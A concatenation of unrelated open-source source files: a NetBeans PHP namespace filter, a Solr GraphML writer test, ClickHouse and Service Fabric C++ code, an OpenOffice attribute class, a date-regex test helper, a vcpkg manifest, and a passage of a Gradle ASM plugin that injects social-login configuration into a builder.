org.netbeans.modules.php.editor.model.nodes.NamespaceDeclarationInfo; public class NamespaceIndexFilter<T extends ElementHandle> { private final String requestPrefix; private final QualifiedName prefix; private QualifiedNameKind kind; private String namespaceName; private String name; private int segmentSize; public NamespaceIndexFilter(String requestPrefix) { super(); this.requestPrefix = requestPrefix; this.prefix = QualifiedName.create(requestPrefix); } public NamespaceIndexFilter(QualifiedName qname) { super(); this.requestPrefix = qname.toString(); this.prefix = qname; } /** * @return the prefixStr */ public String getRequestPrefix() { return requestPrefix; } /** * @return the namespaceName */ public String getNamespaceName() { if (namespaceName == null) { namespaceName = prefix.toNamespaceName(true).toString(); } return namespaceName; } /** * @return the name */ public String getName() { if (name == null) { name = prefix.toString(); } return name; } public QualifiedNameKind getKind() { if (kind == null) { kind = prefix.getKind(); } return kind; } public int getSegmentSize() { if (segmentSize != -1) { segmentSize = prefix.getSegments().size(); } return segmentSize; } public Collection<T> filter(final Collection<T> originalElems) { return filter(originalElems, getName().trim().length() == 0); } public Collection<? extends ModelElement> filterModelElements(final Collection<? extends ModelElement> originalElems, boolean strictCCOption) { if (getKind().isUnqualified()) { return originalElems; } List<ModelElement> retval = new ArrayList<>(); String namespaneNameLCase = getNamespaceName().toLowerCase(); String namespaneNameLCaseSlashed = namespaneNameLCase; if (!namespaneNameLCaseSlashed.endsWith("\\")) { //NOI18N namespaneNameLCaseSlashed += "\\"; } for (ModelElement elem : originalElems) { final Scope inScope = elem.getInScope(); ModelElement originalElem = null; if (inScope instanceof TypeScope) { originalElem = elem; elem = inScope; } String fqn = elem.getNamespaceName().append(elem.getName()).toFullyQualified().toString(); final int indexOf = fqn.toLowerCase().indexOf(namespaneNameLCaseSlashed); final boolean fullyQualified = getKind().isFullyQualified(); if (fullyQualified ? indexOf == 0 : indexOf != -1) { if (strictCCOption && (fullyQualified || getSegmentSize() > 1)) { final QualifiedName nsFqn = QualifiedName.create(fqn).toNamespaceName(true); if (nsFqn.toString().toLowerCase().indexOf(namespaneNameLCase) == -1) { continue; } final String elemName = fqn.substring(indexOf + namespaneNameLCaseSlashed.length()); if (elemName.indexOf(NamespaceDeclarationInfo.NAMESPACE_SEPARATOR) != -1) { continue; } } retval.add(originalElem != null ? originalElem : elem); } } return retval; } public Collection<T> filter(final Collection<T> originalElems, boolean strictCCOption) { if (getKind().isUnqualified()) { return originalElems; } Collection<T> retval = new ArrayList<>(); String namespaneNameLCase = getNamespaceName().toLowerCase(); String namespaneNameLCaseSlashed = namespaneNameLCase; if (!namespaneNameLCaseSlashed.endsWith("\\")) { //NOI18N namespaneNameLCaseSlashed += "\\"; } for (T elem : originalElems) { if (elem instanceof FullyQualifiedElement || elem instanceof TypeMemberElement) { if (elem instanceof TypeMemberElement) { int idx = ((TypeMemberElement) elem).getType().getName().toLowerCase().indexOf(getName().toLowerCase()); if (idx == -1) { retval.add(elem); continue; } } String fqn = elem instanceof FullyQualifiedElement ? ((FullyQualifiedElement) elem).getFullyQualifiedName().toString() : ((TypeMemberElement) elem).getType().getFullyQualifiedName().toString(); final int indexOf = fqn.toLowerCase().indexOf(namespaneNameLCaseSlashed); final boolean fullyQualified = getKind().isFullyQualified(); if (fullyQualified ? indexOf == 0 : indexOf != -1) { if (strictCCOption && (fullyQualified || getSegmentSize() > 1)) { final QualifiedName nsFqn = QualifiedName.create(fqn).toNamespaceName(true); if (nsFqn.toString().toLowerCase().indexOf(namespaneNameLCase) == -1) { continue; } final String elemName = fqn.substring(indexOf + namespaneNameLCaseSlashed.length()); if (elemName.indexOf(NamespaceDeclarationInfo.NAMESPACE_SEPARATOR) != -1) { continue; } } retval.add(elem); } } else if (namespaneNameLCase.equals(NamespaceDeclarationInfo.DEFAULT_NAMESPACE_NAME)) { retval.add(elem); } } return retval; } }
3,197
585
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.response; import java.io.StringWriter; import java.util.Map; import java.util.HashMap; import java.util.List; import java.util.ArrayList; import java.util.Iterator; import org.apache.solr.SolrTestCaseJ4; import org.apache.solr.client.solrj.io.comp.StreamComparator; import org.apache.solr.client.solrj.io.graph.Traversal; import org.apache.solr.client.solrj.io.stream.TupleStream; import org.apache.solr.client.solrj.io.stream.StreamContext; import org.apache.solr.client.solrj.io.stream.expr.StreamFactory; import org.apache.solr.client.solrj.io.Tuple; import org.apache.solr.client.solrj.io.stream.expr.Explanation; import org.apache.solr.request.SolrQueryRequest; import org.apache.solr.util.BaseTestHarness; import org.junit.BeforeClass; import org.junit.Test; public class TestGraphMLResponseWriter extends SolrTestCaseJ4 { @BeforeClass public static void beforeClass() throws Exception { System.setProperty("enable.update.log", "false"); // schema12 doesn't support _version_ initCore("solrconfig.xml","schema12.xml"); } @Test @SuppressWarnings({"unchecked"}) public void testGraphMLOutput() throws Exception { SolrQueryRequest request = req("blah", "blah"); // Just need a request to attach the stream and traversal to. SolrQueryResponse response = new SolrQueryResponse(); @SuppressWarnings({"rawtypes"}) Map context = request.getContext(); TupleStream stream = new TestStream(); //Simulates a GatherNodesStream Traversal traversal = new Traversal(); context.put("traversal", traversal); context.put("stream", stream); StringWriter writer = new StringWriter(); GraphMLResponseWriter graphMLResponseWriter = new GraphMLResponseWriter(); graphMLResponseWriter.write(writer, request, response); String graphML = writer.toString(); //Validate the nodes String error = BaseTestHarness.validateXPath(graphML, "//graph/node[1][@id ='bill']", "//graph/node[2][@id ='jim']", "//graph/node[3][@id ='max']"); if(error != null) { throw new Exception(error); } //Validate the edges error = BaseTestHarness.validateXPath(graphML, "//graph/edge[1][@source ='jim']", "//graph/edge[1][@target ='bill']", "//graph/edge[2][@source ='max']", "//graph/edge[2][@target ='bill']", "//graph/edge[3][@source ='max']", "//graph/edge[3][@target ='jim']", "//graph/edge[4][@source ='jim']", "//graph/edge[4][@target ='max']" ); if(error != null) { throw new Exception(error); } } @SuppressWarnings({"unchecked"}) private static class TestStream extends TupleStream { private Iterator<Tuple> tuples; public TestStream() { //Create some nodes List<Tuple> testTuples = new ArrayList<>(); @SuppressWarnings({"rawtypes"}) Map m1 = new HashMap(); List<String> an1 = new ArrayList<>(); an1.add("jim"); an1.add("max"); m1.put("node", "bill"); m1.put("ancestors", an1); testTuples.add(new Tuple(m1)); @SuppressWarnings({"rawtypes"}) Map m2 = new HashMap(); List<String> an2 = new ArrayList<>(); an2.add("max"); m2.put("node", "jim"); m2.put("ancestors", an2); testTuples.add(new Tuple(m2)); @SuppressWarnings({"rawtypes"}) Map m3 = new HashMap(); List<String> an3 = new ArrayList<>(); an3.add("jim"); m3.put("node", "max"); m3.put("ancestors", an3); testTuples.add(new Tuple(m3)); tuples = testTuples.iterator(); } public StreamComparator getStreamSort() { return null; } public void close() { } public void open() { } public List<TupleStream> children() { return null; } @SuppressWarnings({"unchecked"}) public Tuple read() { if(tuples.hasNext()) { return tuples.next(); } else { @SuppressWarnings({"rawtypes"}) Map map = new HashMap(); map.put("EOF", true); return new Tuple(map); } } public void setStreamContext(StreamContext streamContext) { } public Explanation toExplanation(StreamFactory factory) { return null; } } }
2,173
15,577
#include <IO/WriteBufferFromString.h> #include <IO/Operators.h> #include <Columns/IColumn.h> #include <Columns/ColumnNullable.h> #include <Columns/ColumnConst.h> #include <Core/Field.h> namespace DB { String IColumn::dumpStructure() const { WriteBufferFromOwnString res; res << getFamilyName() << "(size = " << size(); ColumnCallback callback = [&](ColumnPtr & subcolumn) { res << ", " << subcolumn->dumpStructure(); }; const_cast<IColumn*>(this)->forEachSubcolumn(callback); res << ")"; return res.str(); } void IColumn::insertFrom(const IColumn & src, size_t n) { insert(src[n]); } bool isColumnNullable(const IColumn & column) { return checkColumn<ColumnNullable>(column); } bool isColumnConst(const IColumn & column) { return checkColumn<ColumnConst>(column); } }
309
2,542
<gh_stars>1000+ // ------------------------------------------------------------ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License (MIT). See License.txt in the repo root for license information. // ------------------------------------------------------------ #pragma once #define RATE_INDEX 0 #define AVG_BASE_INDEX 50 #define DURATION_INDEX 100 #define RATE_COUNTER( Id, Name, Description ) \ COUNTER_DEFINITION( RATE_INDEX+Id, Common::PerformanceCounterType::RateOfCountPerSecond32, Name, Description ) #define AVG_BASE( Id, Name ) \ COUNTER_DEFINITION( AVG_BASE_INDEX+Id, Common::PerformanceCounterType::AverageBase, Name, L"", noDisplay) #define DURATION_COUNTER( Id, Name, Description ) \ COUNTER_DEFINITION_WITH_BASE( DURATION_INDEX+Id, AVG_BASE_INDEX+Id, Common::PerformanceCounterType::AverageCount64, Name, Description ) #define DEFINE_RATE_COUNTER( Id, Name) \ DEFINE_COUNTER_INSTANCE( Name, RATE_INDEX+Id ) #define DEFINE_AVG_BASE_COUNTER( Id, Name) \ DEFINE_COUNTER_INSTANCE( Name, AVG_BASE_INDEX+Id ) #define DEFINE_DURATION_COUNTER( Id, Name) \ DEFINE_COUNTER_INSTANCE( Name, DURATION_INDEX+Id ) namespace Naming { class NamingPerformanceCounters { DENY_COPY(NamingPerformanceCounters) public: BEGIN_COUNTER_SET_DEFINITION( L"7CF963F9-5E87-42F0-BAEE-B98C86206BA6", L"Naming Service", L"Counters for Naming Service", Common::PerformanceCounterSetInstanceType::Multiple) RATE_COUNTER( 1, L"AO Create Name req/sec", L"Incoming (authority owner) create name requests per second") RATE_COUNTER( 2, L"AO Delete Name req/sec", L"Incoming (authority owner) delete name requests per second") RATE_COUNTER( 3, L"NO Create Name req/sec", L"Incoming (name owner) create name requests per second") RATE_COUNTER( 4, L"NO Delete Name req/sec", L"Incoming (name owner) delete name requests per second") RATE_COUNTER( 5, L"Name Exists req/sec", L"Incoming name exists requests per second") RATE_COUNTER( 6, L"AO Create Service req/sec", L"Incoming (authority owner) create service requests per second") RATE_COUNTER( 7, L"AO Update Service req/sec", L"Incoming (authority owner) update service requests per second") RATE_COUNTER( 8, L"AO Delete Service req/sec", L"Incoming (authority owner) delete service requests per second") RATE_COUNTER( 9, L"NO Create Service req/sec", L"Incoming (name owner) create service requests per second") RATE_COUNTER( 10, L"NO Update Service req/sec", L"Incoming (name owner) update service requests per second") RATE_COUNTER( 11, L"NO Delete Service req/sec", L"Incoming (name owner) delete service requests per second") RATE_COUNTER( 12, L"Enumerate Names req/sec", L"Incoming enumerate names requests per second") RATE_COUNTER( 13, L"Enumerate Properties req/sec", L"Incoming enumerate properties requests per second") RATE_COUNTER( 14, L"Property Batch req/sec", L"Incoming property batch per second") RATE_COUNTER( 15, L"Get Service Description req/sec", L"Incoming get service description requests per second") RATE_COUNTER( 16, L"Prefix Resolve req/sec", L"Incoming prefix resolve requests per second") RATE_COUNTER( 17, L"Unrecognized Operation req/sec", L"Incoming unrecognized operation per second") AVG_BASE( 1, L"Base for AO Create Name avg. duration (us)" ) AVG_BASE( 2, L"Base for AO Delete Name avg. duration (us)" ) AVG_BASE( 3, L"Base for NO Create Name avg. duration (us)" ) AVG_BASE( 4, L"Base for NO Delete Name avg. duration (us)" ) AVG_BASE( 5, L"Base for Name Exists avg. duration (us)" ) AVG_BASE( 6, L"Base for AO Create Service avg. duration (us)" ) AVG_BASE( 7, L"Base for AO Update Service avg. duration (us)" ) AVG_BASE( 8, L"Base for AO Delete Service avg. duration (us)" ) AVG_BASE( 9, L"Base for NO Create Service avg. duration (us)" ) AVG_BASE( 10, L"Base for NO Update Service avg. duration (us)" ) AVG_BASE( 11, L"Base for NO Delete Service avg. duration (us)" ) AVG_BASE( 12, L"Base for Enumerate Names avg. duration (us)" ) AVG_BASE( 13, L"Base for Enumerate Properties avg. duration (us)" ) AVG_BASE( 14, L"Base for Property Batch avg. duration (us)" ) AVG_BASE( 15, L"Base for Get Service Description avg. duration (us)" ) AVG_BASE( 16, L"Base for Prefix Resolve avg. duration (us)" ) AVG_BASE( 17, L"Base for Unrecognized Operation avg. duration (us)" ) DURATION_COUNTER( 1, L"AO Create Name avg. duration (us)", L"Average (authority owner) create name processing time in microseconds") DURATION_COUNTER( 2, L"AO Delete Name avg. duration (us)", L"Average (authority owner) delete name processing time in microseconds") DURATION_COUNTER( 3, L"NO Create Name avg. duration (us)", L"Average (name owner) create name processing time in microseconds") DURATION_COUNTER( 4, L"NO Delete Name avg. duration (us)", L"Average (name owner) delete name processing time in microseconds") DURATION_COUNTER( 5, L"Name Exists avg. duration (us)", L"Average name exists processing time in microseconds") DURATION_COUNTER( 6, L"AO Create Service avg. duration (us)", L"Average (authority owner) create service processing time in microseconds") DURATION_COUNTER( 7, L"AO Update Service avg. duration (us)", L"Average (authority owner) update service processing time in microseconds") DURATION_COUNTER( 8, L"AO Delete Service avg. duration (us)", L"Average (authority owner) delete service processing time in microseconds") DURATION_COUNTER( 9, L"NO Create Service avg. duration (us)", L"Average (name owner) create service processing time in microseconds") DURATION_COUNTER( 10, L"NO Update Service avg. duration (us)", L"Average (name owner) update service processing time in microseconds") DURATION_COUNTER( 11, L"NO Delete Service avg. duration (us)", L"Average (name owner) delete service processing time in microseconds") DURATION_COUNTER( 12, L"Enumerate Names avg. duration (us)", L"Average enumerate names processing time in microseconds") DURATION_COUNTER( 13, L"Enumerate Properties avg. duration (us)", L"Average enumerate properties processing time in microseconds") DURATION_COUNTER( 14, L"Property Batch avg. duration (us)", L"Incoming property batch per second") DURATION_COUNTER( 15, L"Get Service Description avg. duration (us)", L"Average get service description processing time in microseconds") DURATION_COUNTER( 16, L"Prefix Resolve avg. duration (us)", L"Average prefix resolution processing time in microseconds") DURATION_COUNTER( 17, L"Unrecognized Operation avg. duration (us)", L"Incoming unrecognized operation processing time in microseconds") END_COUNTER_SET_DEFINITION() DECLARE_COUNTER_INSTANCE( RateOfAOCreateName ) DECLARE_COUNTER_INSTANCE( RateOfAODeleteName ) DECLARE_COUNTER_INSTANCE( RateOfNOCreateName ) DECLARE_COUNTER_INSTANCE( RateOfNODeleteName ) DECLARE_COUNTER_INSTANCE( RateOfNameExists ) DECLARE_COUNTER_INSTANCE( RateOfAOCreateService ) DECLARE_COUNTER_INSTANCE( RateOfAOUpdateService ) DECLARE_COUNTER_INSTANCE( RateOfAODeleteService ) DECLARE_COUNTER_INSTANCE( RateOfNOCreateService ) DECLARE_COUNTER_INSTANCE( RateOfNOUpdateService ) DECLARE_COUNTER_INSTANCE( RateOfNODeleteService ) DECLARE_COUNTER_INSTANCE( RateOfEnumerateNames ) DECLARE_COUNTER_INSTANCE( RateOfEnumerateProperties ) DECLARE_COUNTER_INSTANCE( RateOfPropertyBatch ) DECLARE_COUNTER_INSTANCE( RateOfGetServiceDescription ) DECLARE_COUNTER_INSTANCE( RateOfPrefixResolve ) DECLARE_COUNTER_INSTANCE( RateOfInvalidOperation ) DECLARE_COUNTER_INSTANCE( DurationOfAOCreateNameBase ) DECLARE_COUNTER_INSTANCE( DurationOfAODeleteNameBase ) DECLARE_COUNTER_INSTANCE( DurationOfNOCreateNameBase ) DECLARE_COUNTER_INSTANCE( DurationOfNODeleteNameBase ) DECLARE_COUNTER_INSTANCE( DurationOfNameExistsBase ) DECLARE_COUNTER_INSTANCE( DurationOfAOCreateServiceBase ) DECLARE_COUNTER_INSTANCE( DurationOfAOUpdateServiceBase ) DECLARE_COUNTER_INSTANCE( DurationOfAODeleteServiceBase ) DECLARE_COUNTER_INSTANCE( DurationOfNOCreateServiceBase ) DECLARE_COUNTER_INSTANCE( DurationOfNOUpdateServiceBase ) DECLARE_COUNTER_INSTANCE( DurationOfNODeleteServiceBase ) DECLARE_COUNTER_INSTANCE( DurationOfEnumerateNamesBase ) DECLARE_COUNTER_INSTANCE( DurationOfEnumeratePropertiesBase ) DECLARE_COUNTER_INSTANCE( DurationOfPropertyBatchBase ) DECLARE_COUNTER_INSTANCE( DurationOfGetServiceDescriptionBase ) DECLARE_COUNTER_INSTANCE( DurationOfPrefixResolveBase ) DECLARE_COUNTER_INSTANCE( DurationOfInvalidOperationBase ) DECLARE_COUNTER_INSTANCE( DurationOfAOCreateName ) DECLARE_COUNTER_INSTANCE( DurationOfAODeleteName ) DECLARE_COUNTER_INSTANCE( DurationOfNOCreateName ) DECLARE_COUNTER_INSTANCE( DurationOfNODeleteName ) DECLARE_COUNTER_INSTANCE( DurationOfNameExists ) DECLARE_COUNTER_INSTANCE( DurationOfAOCreateService ) DECLARE_COUNTER_INSTANCE( DurationOfAOUpdateService ) DECLARE_COUNTER_INSTANCE( DurationOfAODeleteService ) DECLARE_COUNTER_INSTANCE( DurationOfNOCreateService ) DECLARE_COUNTER_INSTANCE( DurationOfNOUpdateService ) DECLARE_COUNTER_INSTANCE( DurationOfNODeleteService ) DECLARE_COUNTER_INSTANCE( DurationOfEnumerateNames ) DECLARE_COUNTER_INSTANCE( DurationOfEnumerateProperties ) DECLARE_COUNTER_INSTANCE( DurationOfPropertyBatch ) DECLARE_COUNTER_INSTANCE( DurationOfGetServiceDescription ) DECLARE_COUNTER_INSTANCE( DurationOfPrefixResolve ) DECLARE_COUNTER_INSTANCE( DurationOfInvalidOperation ) BEGIN_COUNTER_SET_INSTANCE(NamingPerformanceCounters) DEFINE_RATE_COUNTER( 1, RateOfAOCreateName ) DEFINE_RATE_COUNTER( 2, RateOfAODeleteName ) DEFINE_RATE_COUNTER( 3, RateOfNOCreateName ) DEFINE_RATE_COUNTER( 4, RateOfNODeleteName ) DEFINE_RATE_COUNTER( 5, RateOfNameExists ) DEFINE_RATE_COUNTER( 6, RateOfAOCreateService ) DEFINE_RATE_COUNTER( 7, RateOfAOUpdateService ) DEFINE_RATE_COUNTER( 8, RateOfAODeleteService ) DEFINE_RATE_COUNTER( 9, RateOfNOCreateService ) DEFINE_RATE_COUNTER( 10, RateOfNOUpdateService ) DEFINE_RATE_COUNTER( 11, RateOfNODeleteService ) DEFINE_RATE_COUNTER( 12, RateOfEnumerateNames ) DEFINE_RATE_COUNTER( 13, RateOfEnumerateProperties ) DEFINE_RATE_COUNTER( 14, RateOfPropertyBatch ) DEFINE_RATE_COUNTER( 15, RateOfGetServiceDescription ) DEFINE_RATE_COUNTER( 16, RateOfPrefixResolve ) DEFINE_RATE_COUNTER( 17, RateOfInvalidOperation ) DEFINE_AVG_BASE_COUNTER( 1, DurationOfAOCreateNameBase ) DEFINE_AVG_BASE_COUNTER( 2, DurationOfAODeleteNameBase ) DEFINE_AVG_BASE_COUNTER( 3, DurationOfNOCreateNameBase ) DEFINE_AVG_BASE_COUNTER( 4, DurationOfNODeleteNameBase ) DEFINE_AVG_BASE_COUNTER( 5, DurationOfNameExistsBase ) DEFINE_AVG_BASE_COUNTER( 6, DurationOfAOCreateServiceBase ) DEFINE_AVG_BASE_COUNTER( 7, DurationOfAOUpdateServiceBase ) DEFINE_AVG_BASE_COUNTER( 8, DurationOfAODeleteServiceBase ) DEFINE_AVG_BASE_COUNTER( 9, DurationOfNOCreateServiceBase ) DEFINE_AVG_BASE_COUNTER( 10, DurationOfNOUpdateServiceBase ) DEFINE_AVG_BASE_COUNTER( 11, DurationOfNODeleteServiceBase ) DEFINE_AVG_BASE_COUNTER( 12, DurationOfEnumerateNamesBase ) DEFINE_AVG_BASE_COUNTER( 13, DurationOfEnumeratePropertiesBase ) DEFINE_AVG_BASE_COUNTER( 14, DurationOfPropertyBatchBase ) DEFINE_AVG_BASE_COUNTER( 15, DurationOfGetServiceDescriptionBase ) DEFINE_AVG_BASE_COUNTER( 16, DurationOfPrefixResolveBase ) DEFINE_AVG_BASE_COUNTER( 17, DurationOfInvalidOperationBase ) DEFINE_DURATION_COUNTER( 1, DurationOfAOCreateName ) DEFINE_DURATION_COUNTER( 2, DurationOfAODeleteName ) DEFINE_DURATION_COUNTER( 3, DurationOfNOCreateName ) DEFINE_DURATION_COUNTER( 4, DurationOfNODeleteName ) DEFINE_DURATION_COUNTER( 5, DurationOfNameExists ) DEFINE_DURATION_COUNTER( 6, DurationOfAOCreateService ) DEFINE_DURATION_COUNTER( 7, DurationOfAOUpdateService ) DEFINE_DURATION_COUNTER( 8, DurationOfAODeleteService ) DEFINE_DURATION_COUNTER( 9, DurationOfNOCreateService ) DEFINE_DURATION_COUNTER( 10, DurationOfNOUpdateService ) DEFINE_DURATION_COUNTER( 11, DurationOfNODeleteService ) DEFINE_DURATION_COUNTER( 12, DurationOfEnumerateNames ) DEFINE_DURATION_COUNTER( 13, DurationOfEnumerateProperties ) DEFINE_DURATION_COUNTER( 14, DurationOfPropertyBatch ) DEFINE_DURATION_COUNTER( 15, DurationOfGetServiceDescription ) DEFINE_DURATION_COUNTER( 16, DurationOfPrefixResolve ) DEFINE_DURATION_COUNTER( 17, DurationOfInvalidOperation ) END_COUNTER_SET_INSTANCE() }; typedef std::shared_ptr<NamingPerformanceCounters> PerformanceCountersSPtr; }
5,832
679
/************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #include "precompiled_svx.hxx" #include <svx/sdr/attribute/sdrlinefillshadowtextattribute.hxx> ////////////////////////////////////////////////////////////////////////////// namespace drawinglayer { namespace attribute { SdrLineFillShadowTextAttribute::SdrLineFillShadowTextAttribute( const SdrLineAttribute& rLine, const SdrFillAttribute& rFill, const SdrLineStartEndAttribute& rLineStartEnd, const SdrShadowAttribute& rShadow, const FillGradientAttribute& rFillFloatTransGradient, const SdrTextAttribute& rTextAttribute) : SdrLineShadowTextAttribute(rLine, rLineStartEnd, rShadow, rTextAttribute), maFill(rFill), maFillFloatTransGradient(rFillFloatTransGradient) { } SdrLineFillShadowTextAttribute::SdrLineFillShadowTextAttribute() : SdrLineShadowTextAttribute(), maFill(), maFillFloatTransGradient() { } SdrLineFillShadowTextAttribute::SdrLineFillShadowTextAttribute(const SdrLineFillShadowTextAttribute& rCandidate) : SdrLineShadowTextAttribute(rCandidate), maFill(rCandidate.getFill()), maFillFloatTransGradient(rCandidate.getFillFloatTransGradient()) { } SdrLineFillShadowTextAttribute& SdrLineFillShadowTextAttribute::operator=(const SdrLineFillShadowTextAttribute& rCandidate) { SdrLineShadowTextAttribute::operator=(rCandidate); maFill = rCandidate.getFill(); maFillFloatTransGradient = rCandidate.getFillFloatTransGradient(); return *this; } bool SdrLineFillShadowTextAttribute::isDefault() const { return (SdrLineShadowTextAttribute::isDefault() && getFill().isDefault() && getFillFloatTransGradient().isDefault()); } bool SdrLineFillShadowTextAttribute::operator==(const SdrLineFillShadowTextAttribute& rCandidate) const { return(SdrLineShadowTextAttribute::operator==(rCandidate) && getFill() == rCandidate.getFill() && getFillFloatTransGradient() == rCandidate.getFillFloatTransGradient()); } } // end of namespace attribute } // end of namespace drawinglayer ////////////////////////////////////////////////////////////////////////////// // eof
930
32,544
<filename>core-java/src/test/java/com/baeldung/regexp/datepattern/gregorian/testhelper/GregorianDateTestHelper.java package com.baeldung.regexp.datepattern.gregorian.testhelper; import com.baeldung.regexp.datepattern.DateMatcher; import org.junit.Assert; public class GregorianDateTestHelper { private final DateMatcher matcher; public GregorianDateTestHelper(DateMatcher matcher) { this.matcher = matcher; } public void assertFormat() { Assert.assertTrue(matcher.matches("2017-12-31")); Assert.assertTrue(matcher.matches("2018-01-01")); Assert.assertFalse(matcher.matches("2018-02")); Assert.assertFalse(matcher.matches("2018-02-01-01")); Assert.assertFalse(matcher.matches("2018-02-XX")); Assert.assertFalse(matcher.matches(" 2018-02-01")); Assert.assertFalse(matcher.matches("2018-02-01 ")); Assert.assertFalse(matcher.matches("2020/02/28")); Assert.assertFalse(matcher.matches("2020.02.29")); } public void assertRange() { Assert.assertTrue(matcher.matches("1900-01-01")); Assert.assertTrue(matcher.matches("2205-05-25")); Assert.assertTrue(matcher.matches("2999-12-31")); Assert.assertFalse(matcher.matches("1899-12-31")); Assert.assertFalse(matcher.matches("2018-05-35")); Assert.assertFalse(matcher.matches("2018-13-05")); Assert.assertFalse(matcher.matches("3000-01-01")); Assert.assertFalse(matcher.matches("3200-02-29")); } public void assertFebruary29th() { Assert.assertTrue(matcher.matches("2000-02-29")); Assert.assertTrue(matcher.matches("2400-02-29")); Assert.assertTrue(matcher.matches("2800-02-29")); Assert.assertTrue(matcher.matches("2020-02-29")); Assert.assertTrue(matcher.matches("2024-02-29")); Assert.assertTrue(matcher.matches("2028-02-29")); Assert.assertFalse(matcher.matches("2017-02-29")); Assert.assertFalse(matcher.matches("2018-02-29")); Assert.assertFalse(matcher.matches("2019-02-29")); Assert.assertFalse(matcher.matches("2100-02-29")); Assert.assertFalse(matcher.matches("2200-02-29")); Assert.assertFalse(matcher.matches("2300-02-29")); } public void assertFebruaryGeneralDates() { Assert.assertTrue(matcher.matches("2018-02-01")); Assert.assertTrue(matcher.matches("2019-02-13")); Assert.assertTrue(matcher.matches("2020-02-25")); Assert.assertFalse(matcher.matches("2000-02-30")); Assert.assertFalse(matcher.matches("2400-02-62")); Assert.assertFalse(matcher.matches("2420-02-94")); } public void assertMonthsOf30Days() { Assert.assertTrue(matcher.matches("2018-04-30")); Assert.assertTrue(matcher.matches("2019-06-30")); Assert.assertTrue(matcher.matches("2020-09-30")); Assert.assertTrue(matcher.matches("2021-11-30")); Assert.assertTrue(matcher.matches("2022-04-02")); Assert.assertTrue(matcher.matches("2023-06-14")); Assert.assertTrue(matcher.matches("2024-09-26")); Assert.assertFalse(matcher.matches("2018-04-31")); Assert.assertFalse(matcher.matches("2019-06-31")); Assert.assertFalse(matcher.matches("2020-09-31")); Assert.assertFalse(matcher.matches("2021-11-31")); Assert.assertFalse(matcher.matches("2022-04-32")); Assert.assertFalse(matcher.matches("2023-06-64")); Assert.assertFalse(matcher.matches("2024-09-96")); } public void assertMonthsOf31Dates() { Assert.assertTrue(matcher.matches("2018-01-31")); Assert.assertTrue(matcher.matches("2019-03-31")); Assert.assertTrue(matcher.matches("2020-05-31")); Assert.assertTrue(matcher.matches("2021-07-31")); Assert.assertTrue(matcher.matches("2022-08-31")); Assert.assertTrue(matcher.matches("2023-10-31")); Assert.assertTrue(matcher.matches("2024-12-31")); Assert.assertTrue(matcher.matches("2025-01-03")); Assert.assertTrue(matcher.matches("2026-03-15")); Assert.assertTrue(matcher.matches("2027-05-27")); Assert.assertFalse(matcher.matches("2018-01-32")); Assert.assertFalse(matcher.matches("2019-03-64")); Assert.assertFalse(matcher.matches("2020-05-96")); } }
1,964
10,876
<filename>ports/libdisasm/vcpkg.json { "name": "libdisasm", "version-string": "0.23", "port-version": 9, "description": "x86 Disassembler Library.", "homepage": "https://sourceforge.net/projects/bastard", "dependencies": [ { "name": "vcpkg-cmake", "host": true } ] }
130
454
package com.zfy.social.plugin; import com.zfy.social.plugin.extension.ConfigExt; import com.zfy.social.plugin.extension.Settings; import com.zfy.social.plugin.extension.SocialExt; import com.zfy.social.plugin.lib.AbstractClassVisitor; import com.zfy.social.plugin.lib.TransformX; import com.zfy.social.plugin.lib.UtilX; import org.objectweb.asm.ClassVisitor; import org.objectweb.asm.ClassWriter; import org.objectweb.asm.MethodVisitor; import org.objectweb.asm.Opcodes; import java.util.function.Function; /** * CreateAt : 2020-01-20 * Describe : 访问 class 工具 * * @author chendong */ public class SocialClassVisitorImpl extends AbstractClassVisitor { public static Factory factory = new Factory(); public SocialClassVisitorImpl(ClassVisitor classVisitor) { super(classVisitor); } static class Factory implements Function<ClassWriter, ClassVisitor> { @Override public ClassVisitor apply(ClassWriter classWriter) { return new SocialClassVisitorImpl(classWriter); } } @Override public MethodVisitor watch(MethodVisitor visitor, ClassInfo classInfo, MethodInfo methodInfo) { if ("com/zfy/social/core/SocialOptions$Builder".equals(classInfo.name)) { if ("initConfigByAsm".equals(methodInfo.name)) { UtilX.log("找到 SocialOptions$Builder initConfigByAsm"); return new SocialMethodVisitorImpl(visitor); } } return super.watch(visitor, classInfo, methodInfo); } static class SocialMethodVisitorImpl extends MethodVisitor { public SocialMethodVisitorImpl(MethodVisitor mv) { super(Opcodes.ASM4, mv); } @Override public void visitCode() { SocialExt socialExt = SocialPlugin.getSocialExt(); ConfigExt wx = socialExt.wx; if (wx.enable) { mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(Opcodes.ICONST_1); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wxEnable", "Z"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(wx.appId); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wxAppId", "Ljava/lang/String;"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(wx.appSecret); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wxSecretKey", "Ljava/lang/String;"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(wx.onlyAuthCode ? Opcodes.ICONST_1 : Opcodes.ICONST_0); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wxOnlyAuthCode", "Z"); } 